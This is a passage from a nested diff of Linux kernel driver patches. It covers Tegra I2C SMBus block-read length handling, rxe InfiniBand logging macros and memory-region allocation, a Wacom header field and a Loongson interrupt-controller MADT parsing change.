++		input_abs_set_res(input, code, resolution);
+ 		break;
+ 	case EV_KEY:
+ 	case EV_MSC:
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 16f221388563d..1a40bb8c5810c 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -324,6 +324,7 @@ struct hid_data {
+ 	int ps_connected;
+ 	bool pad_input_event_flag;
+ 	unsigned short sequence_number;
++	int time_delayed;
+ };
+ 
+ struct wacom_remote_data {
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index 6aab84c8d22b4..157066f06a32d 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -242,9 +242,10 @@ struct tegra_i2c_hw_feature {
+  * @is_dvc: identifies the DVC I2C controller, has a different register layout
+  * @is_vi: identifies the VI I2C controller, has a different register layout
+  * @msg_complete: transfer completion notifier
++ * @msg_buf_remaining: size of unsent data in the message buffer
++ * @msg_len: length of message in current transfer
+  * @msg_err: error code for completed message
+  * @msg_buf: pointer to current message data
+- * @msg_buf_remaining: size of unsent data in the message buffer
+  * @msg_read: indicates that the transfer is a read access
+  * @timings: i2c timings information like bus frequency
+  * @multimaster_mode: indicates that I2C controller is in multi-master mode
+@@ -277,6 +278,7 @@ struct tegra_i2c_dev {
+ 
+ 	struct completion msg_complete;
+ 	size_t msg_buf_remaining;
++	unsigned int msg_len;
+ 	int msg_err;
+ 	u8 *msg_buf;
+ 
+@@ -1169,7 +1171,7 @@ static void tegra_i2c_push_packet_header(struct tegra_i2c_dev *i2c_dev,
+ 	else
+ 		i2c_writel(i2c_dev, packet_header, I2C_TX_FIFO);
+ 
+-	packet_header = msg->len - 1;
++	packet_header = i2c_dev->msg_len - 1;
+ 
+ 	if (i2c_dev->dma_mode && !i2c_dev->msg_read)
+ 		*dma_buf++ = packet_header;
+@@ -1242,20 +1244,32 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 		return err;
+ 
+ 	i2c_dev->msg_buf = msg->buf;
++	i2c_dev->msg_len = msg->len;
+ 
+-	/* The condition true implies smbus block read and len is already read */
+-	if (msg->flags & I2C_M_RECV_LEN && end_state != MSG_END_CONTINUE)
+-		i2c_dev->msg_buf = msg->buf + 1;
+-
+-	i2c_dev->msg_buf_remaining = msg->len;
+ 	i2c_dev->msg_err = I2C_ERR_NONE;
+ 	i2c_dev->msg_read = !!(msg->flags & I2C_M_RD);
+ 	reinit_completion(&i2c_dev->msg_complete);
+ 
++	/*
++	 * For SMBUS block read command, read only 1 byte in the first transfer.
++	 * Adjust that 1 byte for the next transfer in the msg buffer and msg
++	 * length.
++	 */
++	if (msg->flags & I2C_M_RECV_LEN) {
++		if (end_state == MSG_END_CONTINUE) {
++			i2c_dev->msg_len = 1;
++		} else {
++			i2c_dev->msg_buf += 1;
++			i2c_dev->msg_len -= 1;
++		}
++	}
++
++	i2c_dev->msg_buf_remaining = i2c_dev->msg_len;
++
+ 	if (i2c_dev->msg_read)
+-		xfer_size = msg->len;
++		xfer_size = i2c_dev->msg_len;
+ 	else
+-		xfer_size = msg->len + I2C_PACKET_HEADER_SIZE;
++		xfer_size = i2c_dev->msg_len + I2C_PACKET_HEADER_SIZE;
+ 
+ 	xfer_size = ALIGN(xfer_size, BYTES_PER_FIFO_WORD);
+ 
+@@ -1295,7 +1309,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 	if (!i2c_dev->msg_read) {
+ 		if (i2c_dev->dma_mode) {
+ 			memcpy(i2c_dev->dma_buf + I2C_PACKET_HEADER_SIZE,
+-			       msg->buf, msg->len);
++			       msg->buf, i2c_dev->msg_len);
+ 
+ 			dma_sync_single_for_device(i2c_dev->dma_dev,
+ 						   i2c_dev->dma_phys,
+@@ -1352,7 +1366,7 @@ static int tegra_i2c_xfer_msg(struct tegra_i2c_dev *i2c_dev,
+ 						i2c_dev->dma_phys,
+ 						xfer_size, DMA_FROM_DEVICE);
+ 
+-			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, msg->len);
++			memcpy(i2c_dev->msg_buf, i2c_dev->dma_buf, i2c_dev->msg_len);
+ 		}
+ 	}
+ 
+@@ -1408,8 +1422,8 @@ static int tegra_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], MSG_END_CONTINUE);
+ 			if (ret)
+ 				break;
+-			/* Set the read byte as msg len */
+-			msgs[i].len = msgs[i].buf[0];
++			/* Set the msg length from first byte */
++			msgs[i].len += msgs[i].buf[0];
+ 			dev_dbg(i2c_dev->dev, "reading %d bytes\n", msgs[i].len);
+ 		}
+ 		ret = tegra_i2c_xfer_msg(i2c_dev, &msgs[i], end_type);
+diff --git a/drivers/infiniband/sw/rxe/rxe.c b/drivers/infiniband/sw/rxe/rxe.c
+index a3f05fdd9fac2..7a7e713de52db 100644
+--- a/drivers/infiniband/sw/rxe/rxe.c
++++ b/drivers/infiniband/sw/rxe/rxe.c
+@@ -160,6 +160,8 @@ void rxe_set_mtu(struct rxe_dev *rxe, unsigned int ndev_mtu)
+ 
+ 	port->attr.active_mtu = mtu;
+ 	port->mtu_cap = ib_mtu_enum_to_int(mtu);
++
++	rxe_info_dev(rxe, "Set mtu to %d", port->mtu_cap);
+ }
+ 
+ /* called by ifc layer to create new rxe device.
+@@ -179,7 +181,7 @@ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ 	int err = 0;
+ 
+ 	if (is_vlan_dev(ndev)) {
+-		pr_err("rxe creation allowed on top of a real device only\n");
++		rxe_err("rxe creation allowed on top of a real device only");
+ 		err = -EPERM;
+ 		goto err;
+ 	}
+@@ -187,14 +189,14 @@ static int rxe_newlink(const char *ibdev_name, struct net_device *ndev)
+ 	rxe = rxe_get_dev_from_net(ndev);
+ 	if (rxe) {
+ 		ib_device_put(&rxe->ib_dev);
+-		rxe_dbg(rxe, "already configured on %s\n", ndev->name);
++		rxe_err_dev(rxe, "already configured on %s", ndev->name);
+ 		err = -EEXIST;
+ 		goto err;
+ 	}
+ 
+ 	err = rxe_net_add(ibdev_name, ndev);
+ 	if (err) {
+-		pr_debug("failed to add %s\n", ndev->name);
++		rxe_err("failed to add %s\n", ndev->name);
+ 		goto err;
+ 	}
+ err:
+diff --git a/drivers/infiniband/sw/rxe/rxe.h b/drivers/infiniband/sw/rxe/rxe.h
+index 2415f3704f576..bd8a8ea4ea8fd 100644
+--- a/drivers/infiniband/sw/rxe/rxe.h
++++ b/drivers/infiniband/sw/rxe/rxe.h
+@@ -38,7 +38,8 @@
+ 
+ #define RXE_ROCE_V2_SPORT		(0xc000)
+ 
+-#define rxe_dbg(rxe, fmt, ...) ibdev_dbg(&(rxe)->ib_dev,		\
++#define rxe_dbg(fmt, ...) pr_debug("%s: " fmt "\n", __func__, ##__VA_ARGS__)
++#define rxe_dbg_dev(rxe, fmt, ...) ibdev_dbg(&(rxe)->ib_dev,		\
+ 		"%s: " fmt, __func__, ##__VA_ARGS__)
+ #define rxe_dbg_uc(uc, fmt, ...) ibdev_dbg((uc)->ibuc.device,		\
+ 		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
+@@ -57,6 +58,48 @@
+ #define rxe_dbg_mw(mw, fmt, ...) ibdev_dbg((mw)->ibmw.device,		\
+ 		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
+ 
++#define rxe_err(fmt, ...) pr_err_ratelimited("%s: " fmt "\n", __func__, \
++					##__VA_ARGS__)
++#define rxe_err_dev(rxe, fmt, ...) ibdev_err_ratelimited(&(rxe)->ib_dev, \
++		"%s: " fmt, __func__, ##__VA_ARGS__)
++#define rxe_err_uc(uc, fmt, ...) ibdev_err_ratelimited((uc)->ibuc.device, \
++		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_pd(pd, fmt, ...) ibdev_err_ratelimited((pd)->ibpd.device, \
++		"pd#%d %s: " fmt, (pd)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_ah(ah, fmt, ...) ibdev_err_ratelimited((ah)->ibah.device, \
++		"ah#%d %s: " fmt, (ah)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_srq(srq, fmt, ...) ibdev_err_ratelimited((srq)->ibsrq.device, \
++		"srq#%d %s: " fmt, (srq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_qp(qp, fmt, ...) ibdev_err_ratelimited((qp)->ibqp.device, \
++		"qp#%d %s: " fmt, (qp)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_cq(cq, fmt, ...) ibdev_err_ratelimited((cq)->ibcq.device, \
++		"cq#%d %s: " fmt, (cq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_mr(mr, fmt, ...) ibdev_err_ratelimited((mr)->ibmr.device, \
++		"mr#%d %s:  " fmt, (mr)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_err_mw(mw, fmt, ...) ibdev_err_ratelimited((mw)->ibmw.device, \
++		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
++
++#define rxe_info(fmt, ...) pr_info_ratelimited("%s: " fmt "\n", __func__, \
++					##__VA_ARGS__)
++#define rxe_info_dev(rxe, fmt, ...) ibdev_info_ratelimited(&(rxe)->ib_dev, \
++		"%s: " fmt, __func__, ##__VA_ARGS__)
++#define rxe_info_uc(uc, fmt, ...) ibdev_info_ratelimited((uc)->ibuc.device, \
++		"uc#%d %s: " fmt, (uc)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_pd(pd, fmt, ...) ibdev_info_ratelimited((pd)->ibpd.device, \
++		"pd#%d %s: " fmt, (pd)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_ah(ah, fmt, ...) ibdev_info_ratelimited((ah)->ibah.device, \
++		"ah#%d %s: " fmt, (ah)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_srq(srq, fmt, ...) ibdev_info_ratelimited((srq)->ibsrq.device, \
++		"srq#%d %s: " fmt, (srq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_qp(qp, fmt, ...) ibdev_info_ratelimited((qp)->ibqp.device, \
++		"qp#%d %s: " fmt, (qp)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_cq(cq, fmt, ...) ibdev_info_ratelimited((cq)->ibcq.device, \
++		"cq#%d %s: " fmt, (cq)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_mr(mr, fmt, ...) ibdev_info_ratelimited((mr)->ibmr.device, \
++		"mr#%d %s:  " fmt, (mr)->elem.index, __func__, ##__VA_ARGS__)
++#define rxe_info_mw(mw, fmt, ...) ibdev_info_ratelimited((mw)->ibmw.device, \
++		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
++
+ /* responder states */
+ enum resp_states {
+ 	RESPST_NONE,
+diff --git a/drivers/infiniband/sw/rxe/rxe_cq.c b/drivers/infiniband/sw/rxe/rxe_cq.c
+index faf49c50bbaba..519ddec29b4ba 100644
+--- a/drivers/infiniband/sw/rxe/rxe_cq.c
++++ b/drivers/infiniband/sw/rxe/rxe_cq.c
+@@ -14,12 +14,12 @@ int rxe_cq_chk_attr(struct rxe_dev *rxe, struct rxe_cq *cq,
+ 	int count;
+ 
+ 	if (cqe <= 0) {
+-		rxe_dbg(rxe, "cqe(%d) <= 0\n", cqe);
++		rxe_dbg_dev(rxe, "cqe(%d) <= 0\n", cqe);
+ 		goto err1;
+ 	}
+ 
+ 	if (cqe > rxe->attr.max_cqe) {
+-		rxe_dbg(rxe, "cqe(%d) > max_cqe(%d)\n",
++		rxe_dbg_dev(rxe, "cqe(%d) > max_cqe(%d)\n",
+ 				cqe, rxe->attr.max_cqe);
+ 		goto err1;
+ 	}
+@@ -50,7 +50,7 @@ int rxe_cq_from_init(struct rxe_dev *rxe, struct rxe_cq *cq, int cqe,
+ 	cq->queue = rxe_queue_init(rxe, &cqe,
+ 			sizeof(struct rxe_cqe), type);
+ 	if (!cq->queue) {
+-		rxe_dbg(rxe, "unable to create cq\n");
++		rxe_dbg_dev(rxe, "unable to create cq\n");
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_icrc.c b/drivers/infiniband/sw/rxe/rxe_icrc.c
+index 71bc2c1895888..fdf5f08cd8f17 100644
+--- a/drivers/infiniband/sw/rxe/rxe_icrc.c
++++ b/drivers/infiniband/sw/rxe/rxe_icrc.c
+@@ -21,7 +21,7 @@ int rxe_icrc_init(struct rxe_dev *rxe)
+ 
+ 	tfm = crypto_alloc_shash("crc32", 0, 0);
+ 	if (IS_ERR(tfm)) {
+-		rxe_dbg(rxe, "failed to init crc32 algorithm err: %ld\n",
++		rxe_dbg_dev(rxe, "failed to init crc32 algorithm err: %ld\n",
+ 			       PTR_ERR(tfm));
+ 		return PTR_ERR(tfm);
+ 	}
+@@ -51,7 +51,7 @@ static __be32 rxe_crc32(struct rxe_dev *rxe, __be32 crc, void *next, size_t len)
+ 	*(__be32 *)shash_desc_ctx(shash) = crc;
+ 	err = crypto_shash_update(shash, next, len);
+ 	if (unlikely(err)) {
+-		rxe_dbg(rxe, "failed crc calculation, err: %d\n", err);
++		rxe_dbg_dev(rxe, "failed crc calculation, err: %d\n", err);
+ 		return (__force __be32)crc32_le((__force u32)crc, next, len);
+ 	}
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_mmap.c b/drivers/infiniband/sw/rxe/rxe_mmap.c
+index a47d72dbc5376..6b7f2bd698799 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mmap.c
++++ b/drivers/infiniband/sw/rxe/rxe_mmap.c
+@@ -79,7 +79,7 @@ int rxe_mmap(struct ib_ucontext *context, struct vm_area_struct *vma)
+ 
+ 		/* Don't allow a mmap larger than the object. */
+ 		if (size > ip->info.size) {
+-			rxe_dbg(rxe, "mmap region is larger than the object!\n");
++			rxe_dbg_dev(rxe, "mmap region is larger than the object!\n");
+ 			spin_unlock_bh(&rxe->pending_lock);
+ 			ret = -EINVAL;
+ 			goto done;
+@@ -87,7 +87,7 @@ int rxe_mmap(struct ib_ucontext *context, struct vm_area_struct *vma)
+ 
+ 		goto found_it;
+ 	}
+-	rxe_dbg(rxe, "unable to find pending mmap info\n");
++	rxe_dbg_dev(rxe, "unable to find pending mmap info\n");
+ 	spin_unlock_bh(&rxe->pending_lock);
+ 	ret = -EINVAL;
+ 	goto done;
+@@ -98,7 +98,7 @@ found_it:
+ 
+ 	ret = remap_vmalloc_range(vma, ip->obj, 0);
+ 	if (ret) {
+-		rxe_dbg(rxe, "err %d from remap_vmalloc_range\n", ret);
++		rxe_dbg_dev(rxe, "err %d from remap_vmalloc_range\n", ret);
+ 		goto done;
+ 	}
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_mr.c b/drivers/infiniband/sw/rxe/rxe_mr.c
+index 5e9a03831bf9f..b10aa1580a644 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mr.c
++++ b/drivers/infiniband/sw/rxe/rxe_mr.c
+@@ -731,7 +731,7 @@ int rxe_dereg_mr(struct ib_mr *ibmr, struct ib_udata *udata)
+ 		return -EINVAL;
+ 
+ 	rxe_cleanup(mr);
+-
++	kfree_rcu(mr);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index e02e1624bcf4d..a2ace42e95366 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -596,7 +596,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 		rxe_port_down(rxe);
+ 		break;
+ 	case NETDEV_CHANGEMTU:
+-		rxe_dbg(rxe, "%s changed mtu to %d\n", ndev->name, ndev->mtu);
++		rxe_dbg_dev(rxe, "%s changed mtu to %d\n", ndev->name, ndev->mtu);
+ 		rxe_set_mtu(rxe, ndev->mtu);
+ 		break;
+ 	case NETDEV_CHANGE:
+@@ -608,7 +608,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 	case NETDEV_CHANGENAME:
+ 	case NETDEV_FEAT_CHANGE:
+ 	default:
+-		rxe_dbg(rxe, "ignoring netdev event = %ld for %s\n",
++		rxe_dbg_dev(rxe, "ignoring netdev event = %ld for %s\n",
+ 			event, ndev->name);
+ 		break;
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_pool.c b/drivers/infiniband/sw/rxe/rxe_pool.c
+index 1151c0b5cceab..6215c6de3a840 100644
+--- a/drivers/infiniband/sw/rxe/rxe_pool.c
++++ b/drivers/infiniband/sw/rxe/rxe_pool.c
+@@ -116,55 +116,12 @@ void rxe_pool_cleanup(struct rxe_pool *pool)
+ 	WARN_ON(!xa_empty(&pool->xa));
+ }
+ 
+-void *rxe_alloc(struct rxe_pool *pool)
+-{
+-	struct rxe_pool_elem *elem;
+-	void *obj;
+-	int err;
+-
+-	if (WARN_ON(!(pool->type == RXE_TYPE_MR)))
+-		return NULL;
+-
+-	if (atomic_inc_return(&pool->num_elem) > pool->max_elem)
+-		goto err_cnt;
+-
+-	obj = kzalloc(pool->elem_size, GFP_KERNEL);
+-	if (!obj)
+-		goto err_cnt;
+-
+-	elem = (struct rxe_pool_elem *)((u8 *)obj + pool->elem_offset);
+-
+-	elem->pool = pool;
+-	elem->obj = obj;
+-	kref_init(&elem->ref_cnt);
+-	init_completion(&elem->complete);
+-
+-	/* allocate index in array but leave pointer as NULL so it
+-	 * can't be looked up until rxe_finalize() is called
+-	 */
+-	err = xa_alloc_cyclic(&pool->xa, &elem->index, NULL, pool->limit,
+-			      &pool->next, GFP_KERNEL);
+-	if (err < 0)
+-		goto err_free;
+-
+-	return obj;
+-
+-err_free:
+-	kfree(obj);
+-err_cnt:
+-	atomic_dec(&pool->num_elem);
+-	return NULL;
+-}
+-
+ int __rxe_add_to_pool(struct rxe_pool *pool, struct rxe_pool_elem *elem,
+ 				bool sleepable)
+ {
+ 	int err;
+ 	gfp_t gfp_flags;
+ 
+-	if (WARN_ON(pool->type == RXE_TYPE_MR))
+-		return -EINVAL;
+-
+ 	if (atomic_inc_return(&pool->num_elem) > pool->max_elem)
+ 		goto err_cnt;
+ 
+@@ -275,9 +232,6 @@ int __rxe_cleanup(struct rxe_pool_elem *elem, bool sleepable)
+ 	if (pool->cleanup)
+ 		pool->cleanup(elem);
+ 
+-	if (pool->type == RXE_TYPE_MR)
+-		kfree_rcu(elem->obj);
+-
+ 	atomic_dec(&pool->num_elem);
+ 
+ 	return err;
+diff --git a/drivers/infiniband/sw/rxe/rxe_pool.h b/drivers/infiniband/sw/rxe/rxe_pool.h
+index 9d83cb32092ff..b42e26427a702 100644
+--- a/drivers/infiniband/sw/rxe/rxe_pool.h
++++ b/drivers/infiniband/sw/rxe/rxe_pool.h
+@@ -54,9 +54,6 @@ void rxe_pool_init(struct rxe_dev *rxe, struct rxe_pool *pool,
+ /* free resources from object pool */
+ void rxe_pool_cleanup(struct rxe_pool *pool);
+ 
+-/* allocate an object from pool */
+-void *rxe_alloc(struct rxe_pool *pool);
+-
+ /* connect already allocated object to pool */
+ int __rxe_add_to_pool(struct rxe_pool *pool, struct rxe_pool_elem *elem,
+ 				bool sleepable);
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index 13283ec06f95e..d5de5ba6940f1 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -19,33 +19,33 @@ static int rxe_qp_chk_cap(struct rxe_dev *rxe, struct ib_qp_cap *cap,
+ 			  int has_srq)
+ {
+ 	if (cap->max_send_wr > rxe->attr.max_qp_wr) {
+-		rxe_dbg(rxe, "invalid send wr = %u > %d\n",
++		rxe_dbg_dev(rxe, "invalid send wr = %u > %d\n",
+ 			 cap->max_send_wr, rxe->attr.max_qp_wr);
+ 		goto err1;
+ 	}
+ 
+ 	if (cap->max_send_sge > rxe->attr.max_send_sge) {
+-		rxe_dbg(rxe, "invalid send sge = %u > %d\n",
++		rxe_dbg_dev(rxe, "invalid send sge = %u > %d\n",
+ 			 cap->max_send_sge, rxe->attr.max_send_sge);
+ 		goto err1;
+ 	}
+ 
+ 	if (!has_srq) {
+ 		if (cap->max_recv_wr > rxe->attr.max_qp_wr) {
+-			rxe_dbg(rxe, "invalid recv wr = %u > %d\n",
++			rxe_dbg_dev(rxe, "invalid recv wr = %u > %d\n",
+ 				 cap->max_recv_wr, rxe->attr.max_qp_wr);
+ 			goto err1;
+ 		}
+ 
+ 		if (cap->max_recv_sge > rxe->attr.max_recv_sge) {
+-			rxe_dbg(rxe, "invalid recv sge = %u > %d\n",
++			rxe_dbg_dev(rxe, "invalid recv sge = %u > %d\n",
+ 				 cap->max_recv_sge, rxe->attr.max_recv_sge);
+ 			goto err1;
+ 		}
+ 	}
+ 
+ 	if (cap->max_inline_data > rxe->max_inline_data) {
+-		rxe_dbg(rxe, "invalid max inline data = %u > %d\n",
++		rxe_dbg_dev(rxe, "invalid max inline data = %u > %d\n",
+ 			 cap->max_inline_data, rxe->max_inline_data);
+ 		goto err1;
+ 	}
+@@ -73,7 +73,7 @@ int rxe_qp_chk_init(struct rxe_dev *rxe, struct ib_qp_init_attr *init)
+ 	}
+ 
+ 	if (!init->recv_cq || !init->send_cq) {
+-		rxe_dbg(rxe, "missing cq\n");
++		rxe_dbg_dev(rxe, "missing cq\n");
+ 		goto err1;
+ 	}
+ 
+@@ -82,14 +82,14 @@ int rxe_qp_chk_init(struct rxe_dev *rxe, struct ib_qp_init_attr *init)
+ 
+ 	if (init->qp_type == IB_QPT_GSI) {
+ 		if (!rdma_is_port_valid(&rxe->ib_dev, port_num)) {
+-			rxe_dbg(rxe, "invalid port = %d\n", port_num);
++			rxe_dbg_dev(rxe, "invalid port = %d\n", port_num);
+ 			goto err1;
+ 		}
+ 
+ 		port = &rxe->port;
+ 
+ 		if (init->qp_type == IB_QPT_GSI && port->qp_gsi_index) {
+-			rxe_dbg(rxe, "GSI QP exists for port %d\n", port_num);
++			rxe_dbg_dev(rxe, "GSI QP exists for port %d\n", port_num);
+ 			goto err1;
+ 		}
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_srq.c b/drivers/infiniband/sw/rxe/rxe_srq.c
+index 82e37a41ced40..27ca82ec0826b 100644
+--- a/drivers/infiniband/sw/rxe/rxe_srq.c
++++ b/drivers/infiniband/sw/rxe/rxe_srq.c
+@@ -13,13 +13,13 @@ int rxe_srq_chk_init(struct rxe_dev *rxe, struct ib_srq_init_attr *init)
+ 	struct ib_srq_attr *attr = &init->attr;
+ 
+ 	if (attr->max_wr > rxe->attr.max_srq_wr) {
+-		rxe_dbg(rxe, "max_wr(%d) > max_srq_wr(%d)\n",
++		rxe_dbg_dev(rxe, "max_wr(%d) > max_srq_wr(%d)\n",
+ 			attr->max_wr, rxe->attr.max_srq_wr);
+ 		goto err1;
+ 	}
+ 
+ 	if (attr->max_wr <= 0) {
+-		rxe_dbg(rxe, "max_wr(%d) <= 0\n", attr->max_wr);
++		rxe_dbg_dev(rxe, "max_wr(%d) <= 0\n", attr->max_wr);
+ 		goto err1;
+ 	}
+ 
+@@ -27,7 +27,7 @@ int rxe_srq_chk_init(struct rxe_dev *rxe, struct ib_srq_init_attr *init)
+ 		attr->max_wr = RXE_MIN_SRQ_WR;
+ 
+ 	if (attr->max_sge > rxe->attr.max_srq_sge) {
+-		rxe_dbg(rxe, "max_sge(%d) > max_srq_sge(%d)\n",
++		rxe_dbg_dev(rxe, "max_sge(%d) > max_srq_sge(%d)\n",
+ 			attr->max_sge, rxe->attr.max_srq_sge);
+ 		goto err1;
+ 	}
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index 9ae7cf93365c7..a40a6d0581500 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -867,10 +867,17 @@ static struct ib_mr *rxe_get_dma_mr(struct ib_pd *ibpd, int access)
+ 	struct rxe_dev *rxe = to_rdev(ibpd->device);
+ 	struct rxe_pd *pd = to_rpd(ibpd);
+ 	struct rxe_mr *mr;
++	int err;
+ 
+-	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr)
+-		return ERR_PTR(-ENOMEM);
++	mr = kzalloc(sizeof(*mr), GFP_KERNEL);
++	if (!mr) {
++		err = -ENOMEM;
++		goto err_out;
++	}
++
++	err = rxe_add_to_pool(&rxe->mr_pool, mr);
++	if (err)
++		goto err_free;
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+@@ -878,8 +885,12 @@ static struct ib_mr *rxe_get_dma_mr(struct ib_pd *ibpd, int access)
+ 
+ 	rxe_mr_init_dma(access, mr);
+ 	rxe_finalize(mr);
+-
+ 	return &mr->ibmr;
++
++err_free:
++	kfree(mr);
++err_out:
++	return ERR_PTR(err);
+ }
+ 
+ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+@@ -893,9 +904,15 @@ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+ 	struct rxe_pd *pd = to_rpd(ibpd);
+ 	struct rxe_mr *mr;
+ 
+-	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr)
+-		return ERR_PTR(-ENOMEM);
++	mr = kzalloc(sizeof(*mr), GFP_KERNEL);
++	if (!mr) {
++		err = -ENOMEM;
++		goto err_out;
++	}
++
++	err = rxe_add_to_pool(&rxe->mr_pool, mr);
++	if (err)
++		goto err_free;
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+@@ -903,14 +920,16 @@ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+ 
+ 	err = rxe_mr_init_user(rxe, start, length, iova, access, mr);
+ 	if (err)
+-		goto err1;
++		goto err_cleanup;
+ 
+ 	rxe_finalize(mr);
+-
+ 	return &mr->ibmr;
+ 
+-err1:
++err_cleanup:
+ 	rxe_cleanup(mr);
++err_free:
++	kfree(mr);
++err_out:
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -925,9 +944,15 @@ static struct ib_mr *rxe_alloc_mr(struct ib_pd *ibpd, enum ib_mr_type mr_type,
+ 	if (mr_type != IB_MR_TYPE_MEM_REG)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr)
+-		return ERR_PTR(-ENOMEM);
++	mr = kzalloc(sizeof(*mr), GFP_KERNEL);
++	if (!mr) {
++		err = -ENOMEM;
++		goto err_out;
++	}
++
++	err = rxe_add_to_pool(&rxe->mr_pool, mr);
++	if (err)
++		goto err_free;
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+@@ -935,14 +960,16 @@ static struct ib_mr *rxe_alloc_mr(struct ib_pd *ibpd, enum ib_mr_type mr_type,
+ 
+ 	err = rxe_mr_init_fast(max_num_sg, mr);
+ 	if (err)
+-		goto err1;
++		goto err_cleanup;
+ 
+ 	rxe_finalize(mr);
+-
+ 	return &mr->ibmr;
+ 
+-err1:
++err_cleanup:
+ 	rxe_cleanup(mr);
++err_free:
++	kfree(mr);
++err_out:
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -1066,7 +1093,7 @@ int rxe_register_device(struct rxe_dev *rxe, const char *ibdev_name)
+ 
+ 	err = ib_register_device(dev, ibdev_name, NULL);
+ 	if (err)
+-		rxe_dbg(rxe, "failed with error %d\n", err);
++		rxe_dbg_dev(rxe, "failed with error %d\n", err);
+ 
+ 	/*
+ 	 * Note that rxe may be invalid at this point if another thread
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index d15fd38c17568..90181c42840b4 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -280,9 +280,6 @@ static void acpi_set_vec_parent(int node, struct irq_domain *parent, struct acpi
+ {
+ 	int i;
+ 
+-	if (cpu_has_flatmode)
+-		node = cpu_to_node(node * CORES_PER_EIO_NODE);
+-
+ 	for (i = 0; i < MAX_IO_PICS; i++) {
+ 		if (node == vec_group[i].node) {
+ 			vec_group[i].parent = parent;
+@@ -343,19 +340,27 @@ static int __init pch_pic_parse_madt(union acpi_subtable_headers *header,
+ 	if (parent)
+ 		return pch_pic_acpi_init(parent, pchpic_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+ static int __init pch_msi_parse_madt(union acpi_subtable_headers *header,
+ 					const unsigned long end)
+ {
++	struct irq_domain *parent;
+ 	struct acpi_madt_msi_pic *pchmsi_entry = (struct acpi_madt_msi_pic *)header;
+-	struct irq_domain *parent = acpi_get_vec_parent(eiointc_priv[nr_pics - 1]->node, msi_group);
++	int node;
++
++	if (cpu_has_flatmode)
++		node = cpu_to_node(eiointc_priv[nr_pics - 1]->node * CORES_PER_EIO_NODE);
++	else
++		node = eiointc_priv[nr_pics - 1]->node;
++
++	parent = acpi_get_vec_parent(node, msi_group);
+ 
+ 	if (parent)
+ 		return pch_msi_acpi_init(parent, pchmsi_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+@@ -379,6 +384,7 @@ int __init eiointc_acpi_init(struct irq_domain *parent,
